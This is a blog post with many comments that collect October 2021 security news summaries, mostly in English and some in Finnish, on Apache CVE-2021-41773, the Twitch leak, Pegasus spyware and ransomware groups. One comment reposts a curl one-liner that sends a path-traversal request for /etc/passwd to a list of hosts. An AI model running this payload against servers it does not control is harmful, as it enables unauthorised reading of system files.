This posting is here to collect cyber security news in October 2021.
I post links to security vulnerability news to comments of this article.
You are also free to post related links to comments.
This posting is here to collect cyber security news in October 2021.
I post links to security vulnerability news to comments of this article.
You are also free to post related links to comments.
376 Comments
Tomi Engdahl says:
Arvio mobiililaitteiden turvallisuuden selvityksestä https://www.kyberturvallisuuskeskus.fi/fi/ajankohtaista/arvio-mobiililaitteiden-turvallisuuden-selvityksesta
Liikenne- ja viestintävirasto Traficomin Kyberturvallisuuskeskus on tutustunut Liettuan kyberturvallisuuskeskuksen tekemän selvityksen raporttiin kolmen älypuhelinvalmistajan mobiililaitteista.
Kyberturvallisuuskeskus on todennut sen olevan pääosin sisällöllisesti paikkansa pitävä. Kyberturvallisuuskeskuksen arviolla kolmansien osapuolten verkkokaupoista voi olla kyberturvallisuuteen liittyviä vaikutuksia.
Tomi Engdahl says:
Apache fixes zero-day vulnerability exploited in the wild, patch now https://www.bleepingcomputer.com/news/security/apache-fixes-zero-day-vulnerability-exploited-in-the-wild-patch-now/
The Apache Software Foundation has released version 2.4.50 of the HTTP Web Server to address two vulnerabilities, one of which is an actively exploited path traversal and file disclosure flaw. The actively exploited zero-day vulnerability is tracked as CVE-2021-41773 and it enables actors to map URLs to files outside the expected document root by launching a path traversal attack.
Tomi Engdahl says:
Android October patch fixes three critical bugs, 41 flaws in total https://www.bleepingcomputer.com/news/security/android-october-patch-fixes-three-critical-bugs-41-flaws-in-total/
Google has released the Android October security updates, addressing
41 vulnerabilities, all ranging between high and critical severity.
None of the 41 flaws addressed this month have been reported to be under active exploitation in the wild, so there should be no working exploits for them circulating out there.
Tomi Engdahl says:
AvosLocker ransomware gang to auction the data of victims who don’t pay https://therecord.media/avoslocker-ransomware-gang-to-auction-the-data-of-victims-who-dont-pay/
The operators of the AvosLocker ransomware gang have updated their website to create a system through which they plan to auction off the data of hacked companies that refuse to pay ransom demands.
Tomi Engdahl says:
Python ransomware script targets ESXi server for encryption https://news.sophos.com/en-us/2021/10/05/python-ransomware-script-targets-esxi-server-for-encryption/
A recently-concluded investigation into a ransomware attack revealed that the attackers executed a custom Python script on the target’s virtual machine hypervisor to encrypt all the virtual disks, taking the organization’s VMs offline. In what was one of the quickest attacks Sophos has investigated, from the time of the initial compromise until the deployment of the ransomware script, the attackers only spent just over three hours on the target’s network before encrypting the virtual disks in a VMware ESXi server.
Tomi Engdahl says:
Telegraph newspaper bares 10TB of subscriber data and server logs to
world+dog
https://www.theregister.com/2021/10/05/telegraph_newspaper_10tb_data_breach/
The Telegraph newspaper managed to leak 10TB of subscriber data and server logs after leaving an Elasticsearch cluster unsecured for most of September, according to the researcher who found it online.
Tomi Engdahl says:
Jopa 1, 5 miljardin Facebook-käyttäjän tiedot väitetysti myynnissä pimeässä verkossa
https://www.tivi.fi/uutiset/tv/0169a572-011f-440c-839c-8c89267d6a00
Peräti 1, 5 miljardin Facebook-käyttäjän tietoja väitetysti kaupitellaan pimeän verkon hakkerifoorumeilla, Privacy Affairs kirjoittaa. Tämä ei liity vastikään tapahtuneeseen Facebook-palveluiden käyttökatkokseen, vaan on yhtiön kannalta vain ikävä yhteensattuma. Kaupiteltava data ei sinänsä pidä sisällään mitään sellaista, mihin urkkija ei pääsisi muutenkin käsiksi, vaan siihen on koottu Facebook-käyttäjien julkiseksi jättämiä tietoja.
Tietojen mukana on ilmeisesti nimi, sähköposti, paikkadataa, sukupuoli, puhelinnumero sekä käyttäjätunnus. Facebook-käyttäjien on syytä miettiä, mitä tietoja he haluavat itsestään jakaa kyseisessä palvelussa. Käyttäjätietojen muuttaminen yksityiseksi voi olla tässä mielessä järkevää.
Tomi Engdahl says:
F-Securen Mikko Hyppönen: Verkkopalvelujen keskittyminen Piilaaksoon on netin heikko kohta Facebookin kyykkäys “aivan poikkeuksellinen”
https://yle.fi/uutiset/3-12128657
Facebookin palveluiden kaatuminen kuudeksi tunniksi osoitti sen, miten haavoittuvaisessa tilanteessa olemme. Tulevaisuudessa internet on yhtä tärkeä kuin sähköverkko, ja se pelottaa jopa F-Securen tutkimusjohtajaa Mikko Hyppöstä.
Tomi Engdahl says:
The entirety of Twitch has reportedly been leaked
SOURCE CODES AND USER PAYOUTS AMONG THE DATA RELEASED IN A 128GB TORRENT
https://www.videogameschronicle.com/news/the-entirety-of-twitch-has-reportedly-been-leaked/
An anonymous hacker claims to have leaked the entirety of Twitch, including its source code and user payout information.
The user posted a 125GB torrent link to 4chan on Wednesday, stating that the leak was intended to “foster more disruption and competition in the online video streaming space” because “their community is a disgusting toxic cesspool”.
VGC can verify that the files mentioned on 4chan are publicly available to download as described by the anonymous hacker.
One anonymous company source told VGC that the leaked data is legitimate, including the source code for the Amazon-owned streaming platform.
If you have a Twitch account, it’s recommend that you also turn on two-factor authentication, which ensures that even if your password is compromised, you still need your phone to prove your identity using either SMS or an authenticator app.
Tomi Engdahl says:
Company that routes SMS for all major US carriers was hacked for five years
Syniverse and carriers haven’t revealed whether text messages were exposed.
https://arstechnica.com/information-technology/2021/10/company-that-routes-sms-for-all-major-us-carriers-was-hacked-for-five-years/
Syniverse, a company that routes hundreds of billions of text messages every year for hundreds of carriers including Verizon, T-Mobile, and AT&T, revealed to government regulators that a hacker gained unauthorized access to its databases for five years. Syniverse and carriers have not said whether the hacker had access to customers’ text messages.
A filing with the Securities and Exchange Commission last week said that “in May 2021, Syniverse became aware of unauthorized access to its operational and information technology systems by an unknown individual or organization. Promptly upon Syniverse’s detection of the unauthorized access, Syniverse launched an internal investigation, notified law enforcement, commenced remedial actions and engaged the services of specialized legal counsel and other incident response professionals.”
Syniverse said that its “investigation revealed that the unauthorized access began in May 2016″ and “that the individual or organization gained unauthorized access to databases within its network on several occasions, and that login information allowing access to or from its Electronic Data Transfer (‘EDT’) environment was compromised for approximately 235 of its customers.”
When contacted by Ars today, a Syniverse spokesperson provided a general statement that mostly repeats what’s in the SEC filing.
Syniverse declined to answer our specific questions about whether text messages were exposed and about the impact on the major US carriers.
“Given the confidential nature of our relationship with our customers and a pending law enforcement investigation, we do not anticipate further public statements regarding this matter,” Syniverse said.
The SEC filing is a preliminary proxy statement related to a pending merger with a special-purpose acquisition company that will make Syniverse a publicly traded firm.
Syniverse routes messages for 300 operators
Syniverse says its intercarrier messaging service processes over 740 billion messages each year for over 300 mobile operators worldwide. Though Syniverse likely isn’t a familiar name to most cell phone users, the company plays a key role in ensuring that text messages get to their destination.
“Syniverse has notified all affected customers of this unauthorized access where contractually required, and Syniverse has concluded that no additional action, including any customer notification, is required at this time,” the SEC filing said. Syniverse told us that it also “implemented substantial additional measures to provide increased protection to our systems and customers” in response to the incident but did not say what those measures are.
Syniverse’s SEC filing was submitted on September 27 and discussed yesterday in an article in Vice’s Motherboard section. According to Vice, a “former Syniverse employee who worked on the EDT systems” said those systems contain information on all types of call records. Vice also quoted an employee of a phone company who said that a hacker could have gained access to the contents of SMS text messages.
Tomi Engdahl says:
Accidental leak reveals US government has secretly hit Google with ‘keyword warrants’ to identify ANYONE searching certain names, addresses, and phone numbers
https://mol.im/a/10063665
https://www.dailymail.co.uk/news/article-10063665/Government-orders-Google-track-searching-certain-names-addresses-phone-numbers.html
Investigators are secretly using keyword warrants to help track down criminals
The relatively new style of warrant orders Google to track and provide user data on anyone who searches specific names, addresses or telephone numbers
Cybersecurity experts fear that keyword warrants set a precedent for breaching the fourth amendment protection against unreasonable searches
Google, however, has defended its decision to respond to the federal government’s keyword warrants and claims they protect users when doing so
Both the FBI and Department of Homeland Security have been cited as entities that have or may use keyword warrants
Tomi Engdahl says:
Princess Haya: Dubai ruler had ex-wife’s phone hacked – UK court
https://lm.facebook.com/l.php?u=https%3A%2F%2Fwww.bbc.co.uk%2Fnews%2Fworld-middle-east-58814978&h=AT0SXizT5JHDETRl77f0Rw7XSyrOJ1d2S3Om0Zf3DwEDVEIag3aY8SiNjq-L4tgjGexaiIc7IawoEbThzRUFk4P4txoIFwDI-Kjgg5Y0VWbR8hQliKDYYqgkJl3xsbRQPg
The High Court has found that the ruler of Dubai, Sheikh Mohammed Al Maktoum, interfered with British justice by ordering the hacking of the phone of his ex-wife, Princess Haya of Jordan.
The phones of her solicitors, Baroness Fiona Shackleton QC and Nick Manners, were also targeted during their divorce custody case, according to the court.
Princess Haya said the discovery had made her feel “hunted and haunted”.
Tomi Engdahl says:
Using My Python Skills To Punish Credit Card Scammers
https://m.youtube.com/watch?v=StmNWzHbQJU
Here we go again, another day, another scammer. This time a scammer decided to use a live payment processor to test validity of cards to scam. Not very smart and he’ll pay because of it.
Tomi Engdahl says:
Why Did Facebook Go Down? – Computerphile
https://www.youtube.com/watch?v=Bie32IZlMtY
Just what was it that took Facebook, Instagram & WhatsApp offline on 4th October 2021? – Dr Steve Bagley investigates!
Ironically, Facebook’s mission statement is best fulfilled when Facebook is disconnected from the Internet.
Many of today’s entrepreneurs live by Facebook founder Mark Zuckerberg’s now-famous motto: “Move fast and break things.”
The Era of “Move Fast and Break Things” Is Over
https://hbr.org/2019/01/the-era-of-move-fast-and-break-things-is-over
Tomi Engdahl says:
Actively exploited Apache 0-day also allows remote code execution https://www.bleepingcomputer.com/news/security/actively-exploited-apache-0-day-also-allows-remote-code-execution/
Proof-of-Concept (PoC) exploits for the Apache web server zero-day surfaced on the internet revealing that the vulnerability is far more critical than originally disclosed. These exploits show that the scope of the vulnerability transcends path traversal, allowing attackers remote code execution (RCE) abilities. Attackers can abuse Apache servers running version 2.4.49 not only to read arbitrary files but also to execute arbitrary code on the servers. Security researcher Hacker Fantastic noted that the flaw soon turns into a Remote Code Execution (RCE) vulnerability on a Linux system if the server is configured to support CGI via mod_cgi. CERT’s vulnerability analyst Will Dormann and security researcher Tim Brown have also reported success with code execution on Windows machines. “Again, Apache needs to be the vulnerable 2.4.49 version, and mod-cgi is enabled, and it needs to be missing the default Require all denied. But if both of those are true, then CVE-2021-41773 is as RCE as it gets, ” explains Dormann.
Tomi Engdahl says:
https://www.bleepingcomputer.com/news/security/actively-exploited-apache-0-day-also-allows-remote-code-execution/
“Was CVE-2021-41773 mis-scoped when it was published?” surmised Dormann, pointing to the note in Apache’s original advisory that exploitation of the flaw would, at most, leak the source code of scripts—rather than running the scripts.
https://httpd.apache.org/security/vulnerabilities_24.html#CVE-2021-41773
Tomi Engdahl says:
Apache test script from https://twitter.com/HackerGautam/status/1445412108863041544
cat targets.txt | while read host do ; do curl –silent –path-as-is –insecure “$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd” | grep “root:*” && echo “$host 33[0;31mVulnerable\n” || echo “$host 33[0;32mNot Vulnerable\n”;done
Tomi Engdahl says:
Anonymous leaks Twitch source code and business data on 4chan https://therecord.media/anonymous-leaks-twitch-source-code-and-business-data-on-4chan/
Individuals claiming to be part of the Anonymous hacker collective have leaked the source code and business data of video streaming platform Twitch via a torrent file posted on the 4chan discussion board earlier today. The source of the leak is currently believed to be an internal Git server. Git servers are typically used by companies to allow large teams of programmers to make controlled and easily reversible changes to source code repositories. The leak was also labeled as “part one, ” suggesting that more data will be leaked in the future. Although no user data was found in the leak, several security researchers have urged users to change their passwords and enable a multi-factor authentication solution for their account as a precaution.
Tomi Engdahl says:
Facebook CEO Mark Zuckerberg on putting profit before safety: ‘That’s just not true’
https://www.zdnet.com/article/facebook-ceo-mark-zuckerberg-on-putting-profit-before-safety-thats-just-not-true/
Facebook founder and CEO Mark Zuckerberg has publicly addressed claims that the social media giant prioritises profit over safety and wellbeing is “just not true”. “We care deeply about issues like safety, wellbeing, and mental health. It’s difficult to see coverage that misrepresents our work and our motives. At the most basic level, I think most of us just don’t recognize the false picture of the company that is being painted, ” Zuckerberg wrote in note to Facebook employees that he publicly posted on his Facebook page.
Tomi Engdahl says:
Singapore inks pact with Finland to mutually recognise IoT security labels https://www.zdnet.com/article/singapore-inks-pact-with-finland-to-mutually-recognise-iot-security-labels/
Year after it introduced a security labelling programme for consumer Internet of Things devices, Singapore has signed an agreement with Finland to recognise each nation’s respective cybersecurity labels, touting it as the first such pact. Touting it as the first of such bilateral recognition, Singapore says the partnership aims to reduce the need for duplicated testing.
Tomi Engdahl says:
Medtronic urgently recalls insulin pump controllers over hacking concerns https://www.bleepingcomputer.com/news/security/medtronic-urgently-recalls-insulin-pump-controllers-over-hacking-concerns/
Medtronic is urgently recalling remote controllers for insulin pumps belonging to the MiniMed Paradigm’ family of products, due to severe cybersecurity risks. The controllers that should be returned to the vendor are models MMT-500 and MMT-503, used with Medtronic MiniMed 508 insulin pump and the MiniMed Paradigm family of insulin pumps. These devices were sold in the United States between August 1999 and July 2018, and it is estimated that there are 31, 310 vulnerable units in use by diabetic patients in the country at the moment.
Tomi Engdahl says:
Fired IT admin revenge-hacks school by wiping data, changing passwords https://www.bleepingcomputer.com/news/security/fired-it-admin-revenge-hacks-school-by-wiping-data-changing-passwords/
A 29-year old wiped data on systems of a secondary school in the U.K.
and changed the passwords at an IT company, in retaliatory cyber attacks for being fired. As a result of his actions, the school’s systems could no longer be accessed and remote learning was impacted at a time when pupils were at home due to the Covid-19 pandemic.
Tomi Engdahl says:
ESET Discovers UEFI Bootkit in Cyber Espionage Campaign
https://www.securityweek.com/eset-discovers-uefi-bootkit-cyber-espionage-campaign
Threat hunters at ESET are training the spotlight on a previously undocumented UEFI bootkit capable of hijacking the EFI System Partition (ESP) to maintain persistence on infected Windows machines.
The ESET discovery is the second real-world UEFI bootkit to be publicly documented in recent weeks, following Kaspersky’s report on a new Windows UEFI bootloader fitted into the FinSpy surveillance spyware product.
According to ESET researchers Anton Cherepanov and Martin Smolar, the malware has evaded detection for almost a decade and was engineered to bypass Windows Driver Signature Enforcement to load its own unsigned driver.
“We traced the roots of this threat back to at least 2012, previously operating as a bootkit for systems with legacy BIOSes,” the research team said, noting that the upgrade to UEFI went unnoticed and undocumented for many years. “The days of UEFI (Unified Extensible Firmware Interface) living in the shadows of the legacy BIOS are gone for good.”
ESET named the threat “ESPecter” and warned it is capable of injecting code to set up command-and-control server connections.
Tomi Engdahl says:
Yubico Enables Biometric Logins With New YubiKey Bio Series
https://www.securityweek.com/yubico-enables-biometric-logins-new-yubikey-bio-series
Yubico this week announced the general availability of YubiKey Bio Series, its first security key to support biometric authentication on desktop computers.
Featuring support for the FIDO2/WebAuthn and U2F protocols, YubiKey Bio Series leverages fingerprint recognition to enable users to securely log in to their accounts using a second factor or without passwords at all.
The new security keys support the biometric enrollment and management features that have been implemented in modern platforms and operating systems.
According to Yubico, the devices have a three chip architecture and they store the biometric fingerprint material in a separate secure element, to ensure increased protection from physical attacks.
With the new YubiKey Bio, users can log in to desktop applications and services that support FIDO protocols, the company says. Microsoft 365 and Azure Active Directory, Citrix Workspace, GitHub, Duo, IBM Security Verify, as well as Okta and Ping Identity are supported out-of-the-box.
Tomi Engdahl says:
Microsec.ai Exits Stealth With Cloud Application Runtime Protection Platform
https://www.securityweek.com/microsecai-exits-stealth-cloud-application-runtime-protection-platform
Microsec.ai on Tuesday emerged from stealth mode to deliver a Cloud Native Application Protection Platform (CNAPP) solution designed to protect cloud-native applications at runtime.
The company’s agentless CNAPP solution aims to secure multi-cloud IaaS and PaaS environments, as well as containers and data, through a single, unified interface.
Founded in February 2021, the Santa Clara, California-based company offers support for major cloud infrastructure providers, including AWS, Azure, Google, IBM, and Oracle.
Microsec.ai claims to provide visibility into containers, microservices, network traffic, workloads, misconfigurations, and vulnerabilities, while also helping organizations remain compliant with policies and regulations and improve their overall security and governance.
“Business critical applications must be always-on and intellectual property must be continuously protected or the business suffers. Today, these valuable resources run in continuously changing IaaS environments that are under constant attack,” Mitthan Meena, Microsec co-founder and CEO, said.
Tomi Engdahl says:
Firefox 93 Improves Protection Against Tracking, Insecure Downloads
https://www.securityweek.com/firefox-93-improves-protection-against-tracking-insecure-downloads
Mozilla this week released Firefox 93 to the stable channel with several security improvements, including better privacy protections, patches, and anti-tracking capabilities.
Starting with Firefox 93, the browser blocks insecure HTTP downloads on encrypted (HTTPS) pages, to keep users safe from potentially unwanted or even malicious downloads.
Given that data transmitted over HTTP isn’t protected, attackers able to intercept that data could not only view it, but also tamper with it. Thus, attackers could potentially replace files downloaded over HTTP with malicious ones, which could lead to full system compromise.
Firefox 93 now blocks such insecure file downloads and prompts the user to stop the download and remove the file, while also offering the choice to continue with the download.
The browser now also blocks downloads in sandboxed iframes, to prevent instances where malicious content could initiate a drive-by download from the sandbox. Thus, unless the sandboxed content has the ‘allow-downloads’ attribute, Firefox will prevent such downloads.
After disabling older iterations of the Transport Layer Security (TLS) protocol last year, Firefox now closes the door on 3DES, a popular encryption algorithm that is nothing more than an adaptation of the Data Encryption Standard.
Tomi Engdahl says:
Over 100,000 Apache HTTP Servers Affected by Actively Exploited Zero-Day Flaw
https://www.securityweek.com/over-100000-apache-http-servers-affected-actively-exploited-zero-day-flaw
Users are urged to immediately patch an Apache HTTP Server zero-day vulnerability that has been exploited in the wild. More than 100,000 servers appear to be exposed to attacks.
Apache HTTP Server is a widely used, open-source HTTP server for Windows and UNIX operating systems. Its developers were informed on September 29 that version 2.4.49 is affected by a path traversal and file disclosure vulnerability.
Version 2.4.50, which should patch the flaw, was released just a few days later, and users are urged to update their installations as soon as possible.
The security hole, tracked as CVE-2021-41773, has been exploited in the wild, Apache HTTP Server developers warned in their advisory. Apache has not shared any information about the attacks, but they may have started before a patch was made available.
Tomi Engdahl says:
Twitch Blog:
Twitch says a server configuration change left data exposed on the internet and let a third-party access its data — Out of an abundance of caution, we have reset all stream keys. You can get your new stream key here: https://dashboard.twitch.tv/settings/ stream.
Updates on the Twitch Security Incident
https://blog.twitch.tv/en/2021/10/06/updates-on-the-twitch-security-incident/
Tomi Engdahl says:
Lorenzo Franceschi-Bicchierai / VICE:
As Twitch grapples with the giant data leak, a look at the impact on its streamers, who had extensive revenue and personal data leaked
The Twitch Hack Is Worse for Streamers Than for Twitch
https://www.vice.com/en/article/jg8w9b/the-twitch-hack-is-worse-for-streamers-than-for-twitch
The leak of source code and some internal security files does not expose sensitive data, according to a former Twitch employee.
Chris Scullion / Video Games Chronicle:
Twitch acknowledges a “breach” after a 4chan user leaks its source code, creator payouts from 2019-2021, proprietary SDKs, internal AWS services, and more
The entirety of Twitch has reportedly been leaked
https://www.videogameschronicle.com/news/the-entirety-of-twitch-has-reportedly-been-leaked/
Source codes and user payouts among the data released in a 128GB torrent
Tomi Engdahl says:
Haroon Siddique / The Guardian:
UK High Court rules that Dubai’s ruler, Sheikh Mohammed, used NSO Group’s Pegasus to hack the phone of his ex-wife and five associates — Sheikh Mohammed used spyware on Princess Haya and five associates in unlawful abuse of power, judge rules — The ruler of Dubai hacked the phone …
Dubai ruler hacked ex-wife using NSO Pegasus spyware, high court judge finds
https://www.theguardian.com/world/2021/oct/06/dubai-ruler-hacked-ex-wife-using-nso-pegasus-spyware-high-court-judge-finds-sheikh-mohammed-princess-haya
Sheikh Mohammed used spyware on Princess Haya and five associates in unlawful abuse of power, judge rules
Tomi Engdahl says:
https://www.dailymail.co.uk/news/article-10063665/Government-orders-Google-track-searching-certain-names-addresses-phone-numbers.html
Tomi Engdahl says:
US Navy ship Facebook page hijacked to stream video games https://blog.malwarebytes.com/hacking-2/2021/10/us-navy-ship-facebook-page-hijacked-to-stream-video-games/
The official Facebook page of the US Navys destroyer-class warship, USS Kidd, has been hijacked. According to Task & Purpose, who first reported on the incident, the account has done nothing but stream Age of Empires, an award-winning, history-based real-time strategy (RTS) video game wherein players get to grow civilizations by progressing them from one historical time frame to another. In an interview with Task & Purpose, Cmdr. Nicole Schwegman, a Navy spokesperson, confirmed the hijacking: The official Facebook page for USS Kidd (DDG 100) was hacked. We are currently working with Facebook technical support to resolve the issue.
Tomi Engdahl says:
FIN12 hits healthcare with quick and focused ransomware attacks https://www.bleepingcomputer.com/news/security/fin12-hits-healthcare-with-quick-and-focused-ransomware-attacks/
While most ransomware actors spend time on the victim network looking for important data to steal, one group favors quick malware deployment against sensitive, high-value targets. It can take less than two days for the FIN12 gang to execute on the target network a file-encrypting payload – most of the time Ryuk ransomware.. Report:
https://www.mandiant.com/resources/fin12-ransomware-intrusion-actor-pursuing-healthcare-targets.
Also:
https://www.zdnet.com/article/no-honor-among-thieves-one-in-five-targets-of-fin12-hacking-group-is-involved-in-healthcare/
Tomi Engdahl says:
16-31 August 2021 Cyber Attacks Timeline https://www.hackmageddon.com/2021/10/07/16-31-august-2021-cyber-attacks-timeline/
Here we go! The second timeline of August 2021 is out (first one here) covering the main cyber attacks occurred in the second fortnight of the same month. And it looks like that the end of Summer led to a decrease in the number of attacks with 78 events, corresponding to the minimum value of the last 12 months. Ransomware continues to dominate the threat landscape, but its percentage dropped to 24.4% (19 out of
78 events) in contrast with 39.6% of the previous fortnight.
Tomi Engdahl says:
Unpatched Dahua cams vulnerable to unauthenticated remote access https://www.bleepingcomputer.com/news/security/unpatched-dahua-cams-vulnerable-to-unauthenticated-remote-access/
Unpatched Dahua cameras are prone to two authentication bypass vulnerabilities, and a proof of concept exploit that came out today makes the case of upgrading pressing. The authentication bypass flaws are tracked as CVE-2021-33044 and CVE-2021-33045, and are both remotely exploitable during the login process by sending specially crafted data packets to the target device. For more details on how that works, you may check out the proof of concept (PoC) that was part of todays full disclosure, which has been posted on GitHub.
Tomi Engdahl says:
Who Is Hunting For Your IPTV Set-Top Box?
https://isc.sans.edu/forums/diary/Who+Is+Hunting+For+Your+IPTV+SetTop+Box/27912/
Ever considered starting a company to create software for TV channel distribution over IP? It is big business with service providers “converging” their networks. Everything is better over IP. Why not TV?
Having TVs and set-top boxes with two-way IP connectivity allows you to collect all kinds of data from your users. Imagine you cannot only charge people for the content, but you can also sell their data to advertisers. You will know exactly what they watch and when. Are they flipping channels during commercials?
Tomi Engdahl says:
Code Execution Bug Affects Yamale Python Package Used by Over 200 Projects https://thehackernews.com/2021/10/code-execution-bug-affects-yamale.html
A high-severity code injection vulnerability has been disclosed in 23andMe’s Yamale, a schema and validator for YAML, that could be trivially exploited by adversaries to execute arbitrary Python code.
The flaw, tracked as CVE-2021-38305 (CVSS score: 7.8), involves manipulating the schema file provided as input to the tool to circumvent protections and achieve code execution. Particularly, the issue resides in the schema parsing function, which allows any input passed to be evaluated and executed, resulting in a scenario where a specially-crafted string within the schema can be abused for the injection of system commands.
Tomi Engdahl says:
Canopy Parental Control App Wide Open to Unpatched XSS Bugs https://threatpost.com/canopy-parental-control-app-unpatched-xss-bugs/175384/
The possible cyberattacks include disabling monitoring, location-tracking of children and malicious redirects of parent-console users. Canopy, a parental control app that offers a range of features meant to protect kids online via content inspection, is vulnerable to a variety of cross-site scripting (XSS) attacks, according to researchers.
Tomi Engdahl says:
Cybercriminals threaten to hack EU hospitals in latest COVID-19 vaccine scam https://www.zdnet.com/article/cybercriminals-threaten-to-hack-eu-hospitals-in-latest-covid-19-vaccine-scam/
Cybersecurity experts have uncovered a new COVID-19 vaccination scam involving hackers tricking victims into providing their personal information under the assumption that cybercriminals can hack into European Union hospitals and falsify vaccination record. DarkOwl, the cybersecurity firm that uncovered the scam, notes that the EU Digital COVID Certificate program and most EU hospitals have stringent cybersecurity measures in place to protect user data.
Tomi Engdahl says:
Twitch vahvisti laajan tietomurron näin suojaat tilisi https://www.is.fi/digitoday/esports/art-2000008315753.html
AMAZONIN omistama striimauspalvelu Twitch on vahvistanut keskiviikkona uutisoidun tietomurron pitävän paikkansa. Twitchin lyhyessä lausunnossa sanottiin yhtiön tutkivan tietomurron laajuutta ja vaikutusta. Lausunnon mukaan tällä hetkellä ei ole merkkejä siitä, että käyttäjätiedot tai luottokorttitiedot olisivat väärissä käsissä..
Myös:
https://www.iltalehti.fi/tietoturva/a/27363ee3-130e-486b-b699-f1707227032f.
https://www.tivi.fi/uutiset/tv/261ba40d-6ca9-4e80-b283-443e43085b5f
Tomi Engdahl says:
NSO Group’s Pegasus malware was used to spy on Dubai princess’s lawyers during child custody dispute https://www.theregister.com/2021/10/07/pegasus_malware_princess_haya/
Cherie Blair tipped off a Jordanian princess that the royal’s estranged husband, the Sheikh of Dubai, had deployed NSO Group’s Pegasus malware against her and her lawyers, a series of explosive High Court judgments [PDFs] have revealed. Set against a backdrop of kidnappings, espionage and a bitterly contested child custody case, the judgments shine fresh light on the abusive uses to which NSO Group’s malware products are put by some of its customers.
Tomi Engdahl says:
Transdev denies data stolen by ransomware group, connects leak to September attack on client https://www.zdnet.com/article/transdev-denies-data-stolen-by-ransomware-group/
French transportation giant Transdev has denied that any of its information was stolen by a ransomware group after cybercriminals claimed to have 200GB of data and threatened to leak it on Sunday, October 10. The LockBit ransomware group listed Transdev on its leak site next to a timer set to expire at 1:00 on Sunday. But Transdev — which calls itself the “largest private provider of multiple modes of transport in North America” — said the data being hawked by Lockbit was from one of their clients.
Tomi Engdahl says:
Aggressive Ransomware Group FIN12 Moves Fast, Targets Big Companies
https://www.securityweek.com/aggressive-ransomware-group-fin12-moves-fast-targets-big-companies
A report published by Mandiant on Thursday details the activities and tools of FIN12, a highly aggressive ransomware group that has likely made a significant amount of money over the past years.
The threat group, tracked until now by Mandiant as UNC1878, has been around since at least October 2018. The UNC classification is assigned to “uncategorized” entities before the cybersecurity firm can determine with certainty if it’s a financially-motivated group (FIN) or a state-sponsored advanced persistent threat actor (APT).
Tomi Engdahl says:
Iran-linked MalKamak Hackers Targeting Aerospace, Telcos With ShellClient RAT
https://www.securityweek.com/iran-linked-malkamak-hackers-targeting-aerospace-telcos-shellclient-rat
Tomi Engdahl says:
Cisco Patches High-Severity Vulnerabilities in Security Appliances, Business Switches
https://www.securityweek.com/cisco-patches-high-severity-vulnerabilities-security-appliances-business-switches
Cisco this week released patches for multiple high-severity vulnerabilities affecting its Web Security Appliance (WSA), Intersight Virtual Appliance, Small Business 220 switches, and other products.
Successful exploitation of these vulnerabilities could allow attackers to cause a denial of service (DoS) condition, execute arbitrary commands as root, or elevate privileges.
Two high-severity issues (CVE-2021-34779, CVE-2021-34780) were found in the Link Layer Discovery Protocol (LLDP) implementation for Small Business 220 series smart switches, leading to the execution of arbitrary code and a denial of service condition.
The software update released for the enterprise switch series also resolves four medium-severity security flaws that could result in LLDP memory corruption on an affected device.
Another severe vulnerability is an insufficient input validation in the Intersight Virtual Appliance. Tracked as CVE-2021-34748, the security hole could lead to the execution of arbitrary commands with root privileges.
This week Cisco also resolved two high-severity vulnerabilities in the ATA 190 series and ATA 190 series multiplatform (MPP) software. Tracked as CVE-2021-34710 and CVE-2021-34735, the flaws could be exploited for remote code execution and to cause a denial of service (DoS) condition, respectively.
Tomi Engdahl says:
I rest my case … no further proof needed:
dont ask me why … think … for the big picture.
Verizon, AT&T and T-Mobile have outages at same time Facebook, Instagram, WhatsApp down
https://lm.facebook.com/l.php?u=https%3A%2F%2Fmetro.co.uk%2F2021%2F10%2F04%2Fverizon-att-t-mobile-outages-as-facebook-instagram-whatsapp-down-15363402%2F&h=AT0bjvhbUmO4irzI98ckEAnHN4Vhh_Kxl6sYtiZPLyec5FpE7JoXaubm-jav5lh7fzBQc3m_UiLtN68SZfVBjJce86EmiOvGRWdsSdKiEGG6wmQv8TrPgXoq-PPt56AogA
Major cellular phone providers AT&T, Verizon and T-Mobile reportedly experienced outages around the same time that Facebook, Instagram and WhatsApp were down.
Tens of thousands of cell phone users were left with service issues worldwide when the outages started around 11.30am ET on Monday, the Daily Mail reported.
Customers said they could not connect to the internet using cellular data, but were able to using WiFi. They were still able to make phone calls and send text messages.
Speculation circulated that the cellular outages were linked, but none of the three major providers have confirmed.
The cellular outages occurred just before Facebook, Instagram, WhatsApp and Facebook Messenger crashed worldwide around 11.44am ET, according to DownDetector. The disruption to the social media platforms has continued for two hours and counting.
The more than two hour outage has already cost the global economy $160million, according to NetBlocks, which tracks internet outages.
Tomi Engdahl says:
Car Thieves Caught Using $27,000 Hacking Device Disguised as a Game Boy
https://www.autoevolution.com/news/car-thieves-caught-using-27000-hacking-device-disguised-as-a-game-boy-171076.html?utm_source=fark&utm_medium=website&utm_content=link&ICID=ref_fark
public health crisis has made it an open season for car thieves across America. As it turns out, the phenomenon is not just limited to the states, it’s spilled over into the UK as well. This time though, the thieves’ nefarious intentions were hidden in a form factor that just made people think they were playing Super Mario Land.
That’s right folks, a merry band of British thieves was arrested this week on suspicion of stealing cars. In their possession was an electronic hacking device designed to work around vehicle security systems. Shockingly, the device was nearly identical to that of a Nintendo Game Boy.
Inside the case could be a wide array of different components and hardware. Devices of this variety are relatively easy to find on websites like Alibaba and Wish.com.
These particular thieves were caught attempting to steal a Mitsubishi Outlander PHEV on CCTV in a parking lot in West Yorkshire.
Car Thieves Arrested After Using $27,000 ‘Game Boy’
The gang used “a handheld device disguised as a Nintendo Game Boy”
https://kotaku.com/car-thieves-arrested-using-27-000-game-boy-1847806007
As the BBC reports, the device, worth around £20,000 (USD$27,000), is able to not just get past a car’s security system, but also start the engine as well. This allows the thieves to quickly drive off with the stolen vehicle.
In this case, the device was hidden inside a fake Game Boy case.
Det Insp Vicky Vessey from West Yorkshire Police told the BBC, “The utter disregard they had for the victims, whose hard-earned vehicles were whisked away in seconds, is totally apparent from the flippant tone heard on the video footage we recovered from one of their phones.”
While a device like this seems like something out of a video game, allowing thieves to just walk up to any car and steal it, each one of these has to be heavily tailored to match the security and coding of a particular vehicle; in this case, the thieves could only steal Mitsubishi Outlanders.
Tomi Engdahl says:
Yorkshire gang’s Game Boy device could unlock car in seconds
https://www.bbc.com/news/uk-england-leeds-58788627
A gang of car thieves used a handheld device disguised as a Nintendo Game Boy to steal vehicles worth £180,000.
Dylan Armer, Christopher Bowes and Thomas Poulson stole five Mitsubishi Outlanders by using the gadget to bypass the cars’ security systems.
West Yorkshire Police said the device, worth £20,000, could unlock and start a car “in a matter of seconds”.
